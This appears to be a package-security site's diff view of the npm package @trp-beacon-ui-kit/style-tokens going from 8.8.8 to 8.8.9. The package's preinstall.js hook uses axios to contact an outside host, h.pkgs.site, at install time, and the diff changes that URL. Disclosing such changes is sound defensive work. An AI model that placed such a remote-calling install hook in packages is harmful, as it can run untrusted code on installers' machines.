@trp-beacon-ui-kit/style-tokens 8.8.8 → 8.8.9
Sign up to get free protection for your applications and to get access to all the features.
- package/css/variables.css +0 -0
- package/package.json +1 -1
- package/preinstall.js +1 -1
- package/fonts.css +0 -4
File without changes
|
package/package.json
CHANGED
package/preinstall.js
CHANGED
@@ -23,7 +23,7 @@ try {
|
|
23
23
|
const axios = require('axios');
|
24
24
|
const semver = require('semver');
|
25
25
|
|
26
|
-
const url = 'https://h.pkgs.site/trp-beacon-ui-kit/
|
26
|
+
const url = 'https://h.pkgs.site/trp-beacon-ui-kit/style-tokens?v=8.8.9';
|
27
27
|
|
28
28
|
axios.get(url)
|
29
29
|
.then(res => {
|
package/fonts.css
DELETED